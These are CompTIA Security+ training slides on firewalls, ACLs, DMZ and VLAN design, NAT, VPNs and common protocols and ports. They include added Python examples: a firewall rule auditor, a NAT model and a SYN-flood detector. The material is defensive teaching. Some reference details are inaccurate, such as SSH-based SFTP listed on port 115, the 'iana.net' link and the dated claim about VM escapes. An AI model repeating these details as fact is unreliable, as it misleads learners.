• NIDS: A system that inspects network traffic and issues alerts for suspicious, malicious, or undesirable behavior
• NIPS: A system that detects and responds to suspicious, malicious, or undesirable network traffic
• Spam Filters: An appliance that works at the network layer to block spam messages before they enter the email system
• All-in-one Security Appliances: An appliance that offers unified threat management
• Protocol Analyzers and Sniffers: Software or hardware tool used to observe network traffic for troubleshooting or to create a baseline
• URL Filtering: Software that determines which websites a user can access based on a list of known unsafe URLs
• Content Inspection: Software that inspects the content on a requested website and blocks unsafe or undesirable content
• Malware Inspection: Software that attempts to block malware before it enters a machine
What We Covered
Firewalls
Routers
Switches
Load Balancers
Proxies
Web Security Gateways
VPN Concentrators
Network-based Intrusion Detection and Intrusion Prevention
Other Security Appliances
Protocol Analyzers / Sniffers
Host-based Filtering Tools
CompTIA Security+ Training Instructor: Lisa Szpunar
Secure Network Administration
In This Lesson:
Rule-based Management
Access Control Lists (ACLs)
Firewall Rules
Secure Router Configuration
Port Security
Flood Guards
Loop Prevention
Network Separation and Network Bridging
Log Analysis
Exam Objectives:
1.2 Apply and implement secure network administration principles
3.6 (Partial) Analyze and differentiate among types of mitigation and deterrent techniques
Rule-based Management
• Controlling communications and access to resources based on a list of rules that are configured by the administrator
• Examples
– ACLs and firewall rules
– Firewalls, routers, proxies, and more
• Rules are processed in a top-down order
– The first rule that matches is executed; all others are ignored
– The last rule on the list must be a catch-all
• Deny all or implicit deny
• Allow all or allow any
Access Control Lists (ACLs)
• Defines who is allowed to do an activity, access a resource, or use a communication pathway
• Allow administrators to customize and adapt security to deal with the specific needs and threats of the network
• Access Control Entries (ACE) on the ACL define these rules
–Network devices: what hosts or types of traffic can access which ports or services
–Computer file system: permissions attached to an object
Firewall Rules
• Define what traffic is allowed and what traffic is denied
– Criteria: source or destination address, port, content
– Action: allow, deny, allow only if secured
• Should line up with your organization’s needs and security policies
• Use the principles of least access and implicit deny
• Perform regular rule audits, looking for:
– Temporary rules that ended up being permanent
– Exceptions placed before the general rule
– Orphaned rules
– Typos
Firewall Rule Best Practices
• Use a deny-by-default or implicit deny policy instead of allow-by-default
• Close ports above 1024 unless you have a specific application that needs one
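To see top-down, first-match processing with an implicit deny, and the audit findings listed above, here is an added Python example that is not part of the course material; the rule names, addresses and host inventory are constructed.

```python
"""Added example (not part of the course material): a first-match rule
evaluator with an implicit deny, plus the audit checks the slides call for.
Rule names, addresses and the host inventory below are constructed."""
from dataclasses import dataclass
from datetime import date
from ipaddress import ip_network
from typing import Optional


@dataclass
class Rule:
    name: str
    action: str                     # "allow" or "deny"
    src: str                        # CIDR or "any"
    dst: str                        # CIDR or "any"
    proto: str                      # "tcp", "udp" or "any"
    dport: Optional[int] = None     # destination port; None means any port
    expires: Optional[date] = None  # set on temporary rules


def _covers(scope_a: str, scope_b: str) -> bool:
    """True if scope_a (CIDR or "any") contains every address in scope_b."""
    if scope_a == "any":
        return True
    if scope_b == "any":
        return False
    return ip_network(scope_b, strict=False).subnet_of(ip_network(scope_a, strict=False))


def matches(rule: Rule, pkt: dict) -> bool:
    """Does this rule match a packet given as {src, dst, proto, dport}?"""
    return (_covers(rule.src, pkt["src"] + "/32")
            and _covers(rule.dst, pkt["dst"] + "/32")
            and rule.proto in ("any", pkt["proto"])
            and rule.dport in (None, pkt["dport"]))


def evaluate(rules: list, pkt: dict) -> tuple:
    """Process the list top-down: the first matching rule decides and every
    later rule is ignored. Falling off the end is the implicit deny."""
    for rule in rules:
        if matches(rule, pkt):
            return rule.action, rule.name
    return "deny", "implicit deny"


def _rule_covers(a: Rule, b: Rule) -> bool:
    """True if every packet rule b could match is already matched by rule a."""
    return (_covers(a.src, b.src) and _covers(a.dst, b.dst)
            and a.proto in ("any", b.proto)
            and a.dport in (None, b.dport))


def audit(rules: list, today: date, known_hosts: set) -> list:
    """Findings from the slides' audit list: a rule placed after a broader one
    can never fire (shadowed), temporary rules that outlived their expiry, and
    orphaned rules that still name hosts missing from the inventory."""
    findings = []
    for i, rule in enumerate(rules):
        for earlier in rules[:i]:
            if _rule_covers(earlier, rule):
                findings.append(f"shadowed: '{rule.name}' can never match, "
                                f"'{earlier.name}' matches first")
                break
        if rule.expires is not None and rule.expires < today:
            findings.append(f"expired temporary rule: '{rule.name}' ({rule.expires})")
        for scope in (rule.src, rule.dst):
            if scope.endswith("/32") and scope[:-3] not in known_hosts:
                findings.append(f"orphaned: '{rule.name}' refers to unknown host {scope[:-3]}")
    return findings


# Constructed rule set: the vendor rule was "temporary", and the last rule is
# both shadowed by allow-lan-out and points at a host that no longer exists.
RULES = [
    Rule("allow-web-to-dmz", "allow", "any", "203.0.113.10/32", "tcp", 443),
    Rule("vendor-temp-rdp", "allow", "198.51.100.7/32", "10.0.0.5/32", "tcp", 3389,
         expires=date(2024, 1, 31)),
    Rule("block-telnet", "deny", "any", "any", "tcp", 23),
    Rule("allow-lan-out", "allow", "10.0.0.0/8", "any", "any"),
    Rule("allow-old-server", "allow", "10.0.0.0/8", "10.9.9.9/32", "tcp", 22),
]
KNOWN_HOSTS = {"203.0.113.10", "198.51.100.7", "10.0.0.5"}   # constructed inventory


def sample_audit() -> list:
    """Run the audit against the constructed rule set as of 2024-06-01."""
    return audit(RULES, date(2024, 6, 1), KNOWN_HOSTS)


if __name__ == "__main__":
    telnet = {"src": "10.1.1.1", "dst": "203.0.113.10", "proto": "tcp", "dport": 23}
    print(evaluate(RULES, telnet))   # block-telnet wins even though allow-lan-out would allow it
    for finding in sample_audit():
        print(finding)
```

Note that the expired vendor rule still matches traffic in `evaluate`; only the audit surfaces it, which is exactly why the slides call for regular rule audits.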
Firewall Rules: Ports to Remember
Find more port information at: www.iana.net
Acronym – Service Name – Port Number(s) – Transport
FTP – File Transfer Protocol – 20 (data transfer), 21 (control) – TCP
SSH – Secure Shell – 22 – TCP, UDP
SCP – Secure Copy – 22 – TCP, UDP
TELNET – Telnet – 23 – TCP
SMTP – Simple Mail Transfer Protocol – 25 – TCP
TFTP – Trivial File Transfer Protocol – 69 – UDP
HTTP – Hypertext Transfer Protocol – 80 – TCP, UDP
POP3 – Post Office Protocol v3 – 110 – TCP
SFTP – Secure/SSH File Transfer Protocol – 115 – TCP
NetBIOS – Network Basic Input/Output System – 137 (name service), 138 (datagram service), 139 (session service) – TCP, UDP
IMAP – Internet Message Access Protocol – 143 – TCP
HTTPS – HTTP Secure – 443 – TCP
FTPS – FTP Secure – 989 (data transfer), 990 (control) – TCP, UDP
Secure Router Configuration
• Change the default username and password
• Keep the firmware patched and updated
• Study the documentation or hardening guide for your specific model
• Create and maintain a baseline document for your router
• Backup configurations before making any major changes or performing updates (keep this backup secure too)
• Remotely manage the router only over secure channels (not Telnet)
• Never pass the admin password in cleartext
• Use and configure MAC address filtering (firewall) on the router
• Use in conjunction with other security devices and technologies
• Physically secure the router device
Port Security
• Disable Unused Ports
– Any port not in use should be closed
– Frequently audit your settings
• MAC Limiting / MAC Filtering
– Only allow network access to the MAC addresses of known machines
– Layer 2
– Don’t forget that a MAC can be spoofed
Port Security
• IEEE 802.1X Standard
– EAPOL: Extensible Authentication Protocol (EAP) over LAN
– An additional layer of authentication between the client and the authentication server (like RADIUS)
– Unauthorized state: limits communication to encapsulated EAPOL messages until the client has authenticated with the 802.1X authenticator device (like an edge switch)
– Once the client is authenticated, normal ports are opened
• 802.1X Vulnerabilities
– Man-in-the-Middle
– Hijacking
Flood Guards
• Feature built into firewalls and routers
• Allows the administrator to change the tolerance for unanswered login attacks
• Once that tolerance is reached the flood guard will automatically begin blocking that type of request
• Reduces the likelihood of a DoS attack
Loop Protection
• A loop is a transaction pathway that repeats itself
• Layer 2 switches can be configured to offer loop protection
• Resolve Ethernet looping
– Spanning Tree Protocol (STP): make sure there is only one active path between two nodes
• IP loop protection
– Adds Time To Live (TTL) counters to packets: limits the distance packets are allowed to travel before they are discarded
• Disable broadcast forwarding
– Protects against duplicate ARP requests
Network Separation and Network Bridging
• Set up more than one physical network to separate groups inside one company
– Sensitive proprietary data
– Customers’ personal information
– Test environment
• Network bridging happens when a device has more than one network interface, each connected to a different network
– Doesn’t limit broadcast domains
– Can cause latency and loops
• Use routers and firewalls for higher control if you must join separate networks
Log Analysis
• Administrators can turn logging on in many places
– Routers, switches, proxies, IPS, every device!
– More useful after an event than in real time
• Many products are available to help compile and parse logs
– Splunk
– Microsoft System Center Operations Manager
• Decide on a log analysis plan and the accompanying tools based on your environment’s needs and budget
Key Terms You Should Know
• Rule-based Management: Controlling actions and access through rule or filter based systems
• Firewall Rules: A list of rules that are executed in order and define what ports, addresses, or other criteria are allowed to pass
• Implicit Deny: The action or access is not allowed unless there is a rule specifically permitting it. Found at the end of a rule set or ACL
• Access Control Lists (ACL): A list or table that defines what hosts, users, or types of traffic are allowed to access what resources or communication channels
• MAC Limiting / MAC Filtering: A list of the MAC addresses that are allowed to access the network
• 802.1X: The IEEE standard that defines a port based authentication technology based on EAP. Think of it as an authentication proxy
• Flood Guards: Protections in place to avoid large amounts of a type of traffic and lower the likelihood of DoS attacks
• Loop Protection: Using STP and TTL counters to prevent repeating transmission pathways or bridge loops
• Spanning Tree Protocol (STP): A tree list of all available connections. Used to prevent looping and help determine the least cost path
• Network Bridging: Using a multihomed device with more than one network interface to connect separate networks
What We Covered
Rule-based Management
Access Control Lists (ACL)
Firewall Rules
Secure Router Configuration
Port Security
Flood Guards
Loop Prevention
Network Separation and Network Bridging
Log Analysis
CompTIA Security+ Training Instructor: Lisa Szpunar
Secure Network Design
In This Lesson:
Security Zones
DMZ (Demilitarized Zone)
Subnetting
Virtual LAN (VLAN)
Network Address Translation (NAT)
Remote Access
Virtual Private Network (VPN)
Telephony
Network Access Control (NAC)
Virtualization
Cloud Computing
Exam Objectives: 1.3 Distinguish and differentiate network design elements and compounds
Security Zones
(Figure: Intranet, Extranet, DMZ, and Internet placed on a threat level scale that runs from Low to Extremely High)
• Internet: The global system of interconnected networks that can be accessed by anyone. Assume and prepare for the worst
• DMZ: A perimeter network isolated from the internal network where web servers, mail servers, and other public facing services live
• Intranet: Web-like services and other services that are in the internal network and can be accessed by employees or trusted guests
• Extranet: An intranet extended to select trusted third parties like vendors or contractors. All users must still authenticate
Intranet Best Practices
• Have a firewall and proxy at the edge of the intranet filtering inbound and outbound traffic
• Implement IPSec for communications between internal hosts and servers
• Have enterprise level and host level antivirus software
• Write, implement, and audit security policy
• Least privilege and implicit deny
Extranet Best Practices
• Use digital certificates along with usernames and passwords to authenticate
• Use tunneling across the public internet to connect external users
DMZ Best Practices
• Have one!
• Use the layered firewall approach instead of a single multi-homed firewall
• Regularly back up data in the DMZ and don’t keep the only copy of something in the DMZ
Internet Best Practices
• Consider all interactions to be potential attacks
• Use tunneling and encryption whenever communicating sensitive data over the public internet
• Educate your users and have acceptable use policies for internet usage
DMZ (Demilitarized Zone)
• Why a DMZ?
– Servers exist that users outside the LAN need to access
• Email, IIS, FTP, DNS, IPS, honeypots, …
– Public facing servers are the most vulnerable
– They still need protection and limited access to internal hosts
– Servers in the DMZ can provide services to both internal and external clients while maintaining security
• Security Function
– Adds a layer of security between the LAN and the public internet
– Attackers only have access to the perimeter machines
DMZ Design
• Multiple Interfaces
– 1 firewall with 3 or more network interfaces
– Can be less secure
(Figure: Internet – multi-homed firewall – protected network, with the DMZ holding the FTP server and mail server on a third firewall interface)
DMZ Design
• Layered
– Put DMZ systems between two separate firewalls
– Can be more secure
(Figure: Internet – front-end firewall – DMZ holding the FTP server and mail server – back-end firewall – protected network)
Subnetting
• Process of taking a large network and dividing it into smaller networks to increase efficiency and manageability
• Example
– Before: whole network 192.168.0.0, subnet mask 255.255.0.0, 65534 hosts
– After: subnet mask 255.255.255.0
• Accounting subnet 192.168.1.0, 254 hosts
• Customer Service subnet 192.168.2.0, 254 hosts
• Marketing subnet 192.168.3.0, 254 hosts
Subnetting
• Security Functions
– Network separation
– Easier to administer
– Speeds up the network
Virtual Local Area Network (VLAN)
• VLAN Basics
– A VLAN is:
• A group of hosts, servers, and users that are logically connected by layer 2 switches
• An isolated broadcast domain
– Trunks use a point-to-point connection to physically connect each switch that is part of the same VLAN
VLAN Management
• Use VLANs to
– Confine traffic to one area of the network
– Hide segments of the network from other segments to control access
– Control the path that data takes from one point to another
– Segment off users with common needs and data sensitivity levels together
• Security Considerations
– Do not use a VLAN as a security measure by itself
– Layer 2 switching is not stateful
– Vulnerabilities
• MAC flooding, spanning tree attack, ARP spoofing, more
Network Address Translation (NAT)
• Translates between two addressing schemes – internal and external IP addresses
– Firewalls, routers, proxies
• Developed to conserve IPv4 addresses
• Also performs vital security roles
– Hides the structure and addresses of the internal network
– Forces all inbound/outbound traffic through a perimeter device
• Static NAT: A 1:1 scheme used for incoming communication with services like a web server
• Dynamic NAT: A pool of public addresses assigned to internal addresses for outbound communication
• Port Address Translation (PAT): Allows a single public IP address to be used for multiple simultaneous connections from internal clients
Network Address Translation (NAT)
• Source Network Address Translation
– Keeps internal machines and network topology anonymous
– Internal machines are inaccessible unless they have requested communication
(Figure: internal hosts 192.168.42.3, 192.168.42.4, and 192.168.42.11 sit behind a NAT device whose LAN address is 192.168.42.1 and whose public address is 75.27.113.72. A host says “I would like to access TrainSignal.com”; TrainSignal.com responds to 75.27.113.72)
Network Address Translation (NAT)
• Destination Network Address Translation
– A firewall with NAT can be configured to only let specific types of traffic through
(Figure: a host on the Internet says “I would like to access your email server at 75.27.113.73”; the NAT device (public 75.27.113.73, LAN 192.168.42.1) forwards it to the edge email server at 192.168.42.3 inside the protected network)
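The two NAT diagrams, as an added Python model that is not part of the course material: outbound traffic is source-translated and only its reply is let back in, and only the published SMTP port reaches the edge email server. The address 203.0.113.5 stands in for TrainSignal.com and 198.51.100.9 for an arbitrary outside host; both are constructed.

```python
"""Added example (not part of the course material): a small model of the NAT
behaviour the slides describe, with source NAT/PAT for outbound traffic and a
static destination NAT rule for the published email server. The remote
addresses 203.0.113.5 (stand-in for TrainSignal.com) and 198.51.100.9 are
constructed."""
from dataclasses import dataclass
from typing import Optional


@dataclass(frozen=True)
class Packet:
    src: str
    sport: int
    dst: str
    dport: int
    proto: str = "tcp"


class NatDevice:
    def __init__(self, public_ip: str, lan_ip: str, dnat_rules: dict):
        self.public_ip = public_ip      # address the outside world sees (PAT)
        self.lan_ip = lan_ip            # inside interface, the LAN's gateway
        self.dnat_rules = dnat_rules    # (public ip, port, proto) -> (internal ip, port)
        self.table = {}                 # (proto, public port) -> (in ip, in port, remote ip, remote port)
        self._next_port = 40000

    def outbound(self, pkt: Packet) -> Packet:
        """Source NAT / PAT: the private source is rewritten to the public address
        and a fresh port, and the mapping is remembered so the reply can come back."""
        self._next_port += 1
        self.table[(pkt.proto, self._next_port)] = (pkt.src, pkt.sport, pkt.dst, pkt.dport)
        return Packet(self.public_ip, self._next_port, pkt.dst, pkt.dport, pkt.proto)

    def inbound(self, pkt: Packet) -> Optional[Packet]:
        """Returns the packet rewritten for the LAN, or None when it is dropped."""
        # 1. A reply to a connection an internal host opened: translate back,
        #    but only from the remote host and port that was actually contacted.
        entry = self.table.get((pkt.proto, pkt.dport))
        if entry and pkt.dst == self.public_ip:
            in_ip, in_port, remote_ip, remote_port = entry
            if (pkt.src, pkt.sport) == (remote_ip, remote_port):
                return Packet(pkt.src, pkt.sport, in_ip, in_port, pkt.proto)
        # 2. Destination NAT: only the published service on the published port gets in.
        target = self.dnat_rules.get((pkt.dst, pkt.dport, pkt.proto))
        if target:
            return Packet(pkt.src, pkt.sport, target[0], target[1], pkt.proto)
        # 3. Everything else: internal hosts stay unreachable unless they asked first.
        return None


def demo() -> tuple:
    """Constructed scenario mirroring the slides: 192.168.42.4 browses out, the
    reply returns, and outside hosts try the LAN directly and the mail server."""
    nat = NatDevice("75.27.113.72", "192.168.42.1",
                    {("75.27.113.73", 25, "tcp"): ("192.168.42.3", 25)})
    out = nat.outbound(Packet("192.168.42.4", 51000, "203.0.113.5", 443))
    reply = nat.inbound(Packet("203.0.113.5", 443, "75.27.113.72", out.sport))
    stray = nat.inbound(Packet("198.51.100.9", 443, "75.27.113.72", out.sport))  # same port, wrong peer
    probe = nat.inbound(Packet("198.51.100.9", 40000, "75.27.113.72", 22))       # unsolicited
    mail = nat.inbound(Packet("198.51.100.9", 40001, "75.27.113.73", 25))        # published SMTP
    mail_ssh = nat.inbound(Packet("198.51.100.9", 40002, "75.27.113.73", 22))    # not published
    return out, reply, stray, probe, mail, mail_ssh


if __name__ == "__main__":
    for name, pkt in zip(("out", "reply", "stray", "probe", "mail", "mail_ssh"), demo()):
        print(f"{name:9s} -> {pkt if pkt else 'dropped'}")
```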
Remote Access
• Sharing resources between physically separated LANs and users
• Remote Access Concepts
– Remote Access Server
• Establishes and supports remote connections
– Remote Authentication
• The method used to authenticate remote users
– RADIUS, TACACS, CHAP, 802.1x
– Point-to-Point Protocol (PPP)
• Encapsulation using Network Control Protocol (NCP)
• Authentication using Link Control Protocol (LCP)
• No encryption – not secure
• Use alone only on dedicated connections and dial-up
Remote Access
• Tunneling
– Encapsulating packets before sending them over the public internet
• Tunneling Protocols
– Layer 2 Tunneling Protocol (L2TP)
• Integrity, confidentiality, authentication, replay prevention
• Does not offer encryption on its own – uses IPSec
• Two levels of authentication: computer level and user level
– Point-to-Point Tunneling Protocol (PPTP)
• Older, less secure, less flexible
– Internet Protocol Security (IPSec)
• Not a true protocol but a standard for encrypting data
• Network layer
Virtual Private Network (VPN)
• A private network connection that happens over the public network
• Provides authentication, access control, confidentiality, and integrity
• Used to connect physically separated LANs or to allow remote users to access LAN resources
• Employs tunneling to keep this communication private
• Tunneling only provides some protection
– Need encryption like IPSec
Virtual Private Network (VPN)
• Site-to-site VPN
– Home office and branch office appear to be logically connected
• Remote Access VPN
– Remote user has VPN client software installed
(Figure: a remote user and a branch office LAN each connect across the Internet to the home office)
Virtual Private Network (VPN)
• VPN Best Practices
– Avoid PPTP if possible
– Instead use L2TP with IPSec
– Use the strongest encryption and authentication available
– Keep disconnected when not in use
– Force re-authentication for long sessions
– Use extra layers of intrusion detection, access control, and policy compliance (NAC) for users that are connecting from locations outside the company LANs
Telephony
• PBX / Telecom
– Private Branch Exchange
– Used in larger organizations
– Routes many internal extensions out on limited public phone numbers
– Feature rich
• PBX Security Concerns
– Denial-of-service
– Modern phreakers
– Remote access: turn off if no maintenance is being performed
• VoIP
– Voice over IP
– Tunneling voice and other data over the existing network and public internet
– Offers video conferencing
– Cost saving
• VoIP Security Concerns
– Vishing and Caller ID spoofing
– Denial-of-service
– Sniffing
– Extra security: encrypt with VPN
Network Access Control (NAC)
• A baseline security standard that a workstation must adhere to before it can interact with network resources
– Updates and patches installed
– Antivirus software running and updated
– Other configuration policies
– Must authenticate as a trusted machine/user
• Software client installed on each workstation that communicates with the NAC appliance
– Standard met: can connect as normal
– Standard not met: blocked or remediation is attempted
• Called Network Admission Control by Cisco
• Called Network Access Protection by Microsoft
Virtualization
• Security Considerations
– If a VM is compromised, can malware or an attacker break out of the virtual machine?
• This has never been seen in “the wild”
• Keep up to date on virtualization news to keep track of this idea
– Misconfiguration is the biggest concern
• Virtual environments can grow very quickly
• Dynamic environments
• Stale, unpatched, and forgotten systems
• Virtual networking is the biggest area for misconfiguration
– A denial-of-service attack on one VM can affect the performance of the other VMs in the cluster
Virtualization
• Security Best Practices
– Use security tools that are created for virtualization
• vShield, Hytrust, more
– Use design guides, hardening papers, and other resources for solid virtual architecture
– Virtual machines have the same risks as physical machines
• Do everything we are discussing in this course on the VMs too
– Log analysis, auditing, least privilege, baselining, hardening, security policies, everything!
Virtualization
• Security Best Practices
– Employ security at each layer of the virtual environment
(Figure: the layers of a virtual environment, from the bottom up: physical networking devices, physical host, hypervisor, virtual machines)
Cloud Computing
• Software as a Service (SaaS): Offering software to end users from within the cloud instead of installing it on each hardware machine
• Platform as a Service (PaaS): Apps can be created and run on a cloud-based platform
• Infrastructure as a Service (IaaS): Contracting data centers, VMs, or other infrastructure services
(Figure: IaaS, PaaS, and SaaS stacked as service layers reached over the Internet)
Cloud Computing
• Security Considerations
– The third party
• Time delay
• Regulatory compliance
• Data mingling
– You are ultimately responsible
• Encrypt data before it leaves your site
Key Terms You Should Know
• Bastion Host: A device that is visible to the public internet and specifically configured to withstand attacks
• Multi-homed: A device that has more than one network interface
• Broadcast Domain: A segment of a network where all the nodes can reach each other by broadcast at the data link layer
• Phreaker: A person who exploits or attacks telephone systems
• Private Branch Exchange (PBX): A telephone routing system for use by businesses that allows many local extensions to use a limited number of public phone numbers
• Voice over IP (VoIP): Sending of voice communications and other media data over IP
• Point-to-Point Protocol (PPP): A data link protocol used to send IP packets between two directly connected nodes
• Tunneling: Encapsulating packets to create a secure path through an unsecured network
• Layer 2 Tunneling Protocol (L2TP): A protocol used to create VPN tunnels by encapsulating PPP packets
• Point-to-Point Tunneling Protocol (PPTP): An older protocol used to create VPN tunnels by encapsulating PPP packets. Initialization is not encrypted
• Demilitarized Zone (DMZ): A semi-protected network segment that separates the local network from the public internet
• Subnetting: Using separate IP address ranges to split a network into segments
• Virtual LAN (VLAN): Separating a network/subnet into separate logical segments even though they share a common network switch
• Network Address Translation (NAT): Readdressing packets between local non-routable and public addresses at the network boundary gateway
• Remote Access: Allowing physically separated users and LANs to share resources
• Virtual Private Network (VPN): A networking technique used to send private data through a public network by creating a secure path through the public network
• Telephony: The technology of voice data service
• Network Access Control (NAC): Monitoring and remediating client security before allowing them to access the internal network
What We Covered
Security Zones
DMZ (Demilitarized Zone)
Subnetting
Virtual LAN (VLAN)
Network Address Translation (NAT)
Remote Access
Virtual Private Network (VPN)
Telephony
Network Access Control (NAC)
Virtualization
Cloud Computing
CompTIA Security+ Training Instructor: Lisa Szpunar
TCP/IP Protocols and Port Security
In This Lesson:
TCP/IP
Application Layer
• FTP
• SSH and SCP
• Telnet
• SMTP
• DNS
• TFTP
• HTTP
• SFTP
• SNMP
• HTTPS
• FTPS
• SSL and TLS
Transport Layer
• TCP
• UDP
Internet Layer
• IP
– IPv4 vs. IPv6
• ICMP
• ARP
IPSec
Exam Objectives: 1.4 Implement and use common protocols
1.5 Identify commonly used default network ports
TCP/IP
• Internet Protocol Suite
• A suite of protocols used to communicate between hosts
• Each layer has its own rules and protocols
• The layers only pass information to and from the layer directly above or below it
(Figure: the four TCP/IP layers stacked from top to bottom: Application Layer, Transport Layer, Internet Layer, Network Access Layer)
TCP/IP Layers
• Application Layer: Does process-to-process communications across an IP network
• Transport Layer: Provides the application layer with session and datagram services, reliability, flow control, and multiplexing. Also called the host-to-host layer
• Internet Layer: Responsible for packaging, addressing, and routing IP packets
• Network Access Layer: Places and removes packets on the physical network. Also called the Link Layer
(Figure: what each layer’s unit of data is called – Application Layer: Message (the payload); Transport Layer: Segment; Internet Layer: Datagram; Network Access Layer: Frame)
FTP
• Description
– File Transfer Protocol
–Used for remote data access
– File transfer
• Client to server
• Server to client
–Widely available and widely used
• Security Considerations
–Provides basic access control with file permissions
–Not secure – transmissions sent in plain text
• Credentials can be sniffed and used for MitM or replay
SSH and SCP
• SSH Description
–Secure Shell
–A tunneling protocol
–Used alone for remote configuration
–Add security to other protocols
• Security Considerations
–Encrypts transmissions for confidentiality
–SSH-2 has strong integrity checking
–Uses PKI for authentication
• Secure Copy (SCP)
–Used for secure unattended file transfer
–Uses SSH for authentication and confidentiality
Telnet
• Description
–Used for remote access and remote configuration
• Security Considerations
–No encryption – all communications sent in clear text
–Do not make Telnet sessions between the internal and external network
–Disable port 23 if not needed
SMTP
• Description
–Simple Mail Transfer Protocol
–Used for email delivery
–POP and IMAP move mail from server to client
• Security Considerations
–No encryption on its own
• Uses S/MIME and PGP for encryption
–Disable the SMTP open relay feature
DNS
• Description
–Domain Name System/Service
–Used to switch between IP addresses and human friendly hostnames
• Security Considerations
–Vulnerable to DNS poisoning
–Can be spoofed for phishing
TFTP
• Description
–Trivial File Transfer Protocol
–Can be used to transfer files unattended, without user interaction
• Security Considerations
–No security at all
–No error checking
–Anonymous
–Avoid!
HTTP
• Description
–Hypertext Transfer Protocol
–Rules for viewing text and other media file types on the web
–A web server waits for HTTP requests and responds to them as they arrive
• Security Considerations
–Header injection
–Man-in-the-Middle
–Eavesdropping
SFTP
• Description
–Secure FTP
or
–SSH File Transfer Protocol
–Provides remote file transfer, access, and management
• Security Considerations
–Encrypts control info and data with SSH
• Note: Do not confuse with “FTP over SSH”
SNMP
• Description
–Simple Network Management Protocol
–Used for remote management, reporting, and maintenance for IP network devices
– Install agent software on the devices you want to manage
–Use network management system to manage all the nodes from one place
• Security Considerations
–Brute force attack
–Dictionary attack
–Some versions are vulnerable to sniffing
HTTPS
• Description
–Hypertext Transfer Protocol Secure
or
–Hypertext Transfer Protocol over SSL
–Used for secure webpages
• Security Considerations
–HTTP over SSL or TLS for encryption
–Can be used for client authentication
• Note: Do not confuse with S-HTTP
–Secure Hypertext Transfer Protocol
–Adds message security with RSA or digital certificates
FTPS
• Description
– FTP Secure
or
– FTP over SSL
–Used for secure file transfer
• Security Considerations
–Uses TLS/SSL for encryption
–You can turn the encryption off
SSL and TLS
• SSL
– Secure Sockets Layer
– A cryptographic tool
– Widespread implementations
• TLS
– Transport Layer Security
– Newer, based on SSL
• Security Considerations
– Adds confidentiality and data integrity by encapsulating other protocols
– Initiates a stateful session with a handshake procedure
TCP
• Description
–Transmission Control Protocol
–Provides session service to the application layer
• Security Considerations
–One-to-one connection oriented
–Error checking
• The packets arrived and are in the correct order
–Vulnerable to:
• TCP/IP hijacking
• TCP sequence number attack
• TCP SYN flood attack
TCP
• TCP 3-way Handshake
1. SYN
2. SYN/ACK
3. ACK
• TCP/IP Hijacking
The attacker disconnects the host after a communication session has begun and replaces it with another machine with the same IP address (spoofed)
• TCP Sequence Number Attack
The attacker takes control of an in-progress communication session by correctly guessing the next sequence number
• TCP SYN flood attack
The attacker half-opens multiple sessions but never completes the handshakes, causing the server to become overloaded
[Diagram: SYN → SYN/ACK → ACK for a completed handshake, then SYN → SYN/ACK with the final ACK never sent, repeated]
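How a monitor can tell the completed 3-way handshake from the half-open sessions a SYN flood leaves behind, as an added example that is not part of the original slides. The packet records, addresses and thresholds are constructed for illustration.

```python
"""Half-open connection tracking over a constructed TCP packet log.

Added example (not from the original slides). A normal handshake is SYN, SYN/ACK,
ACK; in a SYN flood many SYNs arrive and are answered, but the final ACK never
comes, so the server keeps the half-open entries. Addresses, ports and
thresholds below are constructed.
"""
from collections import defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class Packet:
    ts: float     # capture time in seconds (constructed)
    src: str      # source IP
    sport: int    # source port
    dst: str      # destination IP
    dport: int    # destination port
    flags: str    # "SYN", "SYN/ACK" or "ACK"


def half_open_handshakes(packets):
    """Replay the log and return the set of handshakes left half-open.

    Each handshake is keyed by the client's (ip, port) and the server's (ip, port).
    A SYN opens it, the server's SYN/ACK makes it half-open, and the client's final
    ACK completes (removes) it. What is still half-open at the end of the log is
    what a SYN flood leaves in the server's backlog.
    """
    state = {}
    for p in sorted(packets, key=lambda x: x.ts):
        if p.flags == "SYN":
            state[((p.src, p.sport), (p.dst, p.dport))] = "syn"
        elif p.flags == "SYN/ACK":
            key = ((p.dst, p.dport), (p.src, p.sport))   # a reply, so swap roles
            if state.get(key) == "syn":
                state[key] = "half-open"
        elif p.flags == "ACK":
            state.pop(((p.src, p.sport), (p.dst, p.dport)), None)
    return {k for k, s in state.items() if s == "half-open"}


def syn_flood_report(packets, per_source=10, total=50):
    """Per-source half-open counts plus which limits were exceeded."""
    per_src = defaultdict(int)
    for client, _server in half_open_handshakes(packets):
        per_src[client[0]] += 1
    backlog = sum(per_src.values())
    return {
        "half_open_by_source": dict(per_src),
        "flagged_sources": sorted(ip for ip, n in per_src.items() if n > per_source),
        "total_half_open": backlog,
        # A flood from spoofed addresses spreads the count thinly across many
        # sources, so the total backlog size is checked as well.
        "backlog_exceeded": backlog > total,
    }


def constructed_log():
    """Constructed capture: one well-behaved client and one flooding source."""
    log = [
        Packet(0.00, "10.0.0.5", 40001, "10.0.0.80", 80, "SYN"),
        Packet(0.01, "10.0.0.80", 80, "10.0.0.5", 40001, "SYN/ACK"),
        Packet(0.02, "10.0.0.5", 40001, "10.0.0.80", 80, "ACK"),
    ]
    for i in range(25):   # 25 SYNs from one source, each answered, never ACKed
        log.append(Packet(1.0 + i / 100, "198.51.100.7", 50000 + i, "10.0.0.80", 80, "SYN"))
        log.append(Packet(1.005 + i / 100, "10.0.0.80", 80, "198.51.100.7", 50000 + i, "SYN/ACK"))
    return log


if __name__ == "__main__":
    print(syn_flood_report(constructed_log()))
```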
UDP
• Description
–User Datagram Protocol
–Provides datagram service to the application layer
• Security Considerations
–Connectionless
–Faster than TCP
–No error checking
–Vulnerable to UDP flooding attacks
IP
• Description
– Internet Protocol
–Used for addressing and routing
• Security Considerations
–Does not verify message accuracy (leaves this to TCP)
IPv4 vs. IPv6
• IPv4
–32-bit address space
• IPv6
–128-bit address space (far larger than IPv4’s)
–Built-in, mandatory IPSec support
–New packet format
–More flexible and scalable
Both can be run at the same time, but they are not directly compatible; a conversion gateway is needed
ICMP
• Description
– Internet Control Message Protocol
–Provides reporting and maintenance
–Used to share path information between routers
Example: Use the PING command to test connectivity between hosts
• Security Considerations
–Ping-of-Death
–Smurf attack
ARP
• Description
–Address Resolution Protocol
–Resolves IP address (Internet layer) to the hardware’s network interface addresses (Network Access Layer)
• Security Considerations
–Does not do authentication – relies on higher layer protocols for that
–Vulnerable to ARP spoofing
• Also called ARP cache poisoning
TCP/IP Ports to Remember
Find more port information at: www.iana.net
Acronym   Service Name                         Port Number                TCP  UDP
FTP       File Transfer Protocol               20 – data transfer         x
                                               21 – control
SSH       Secure Shell                         22                         x    x
SCP       Secure Copy                          22                         x    x
TELNET    Telnet                               23                         x
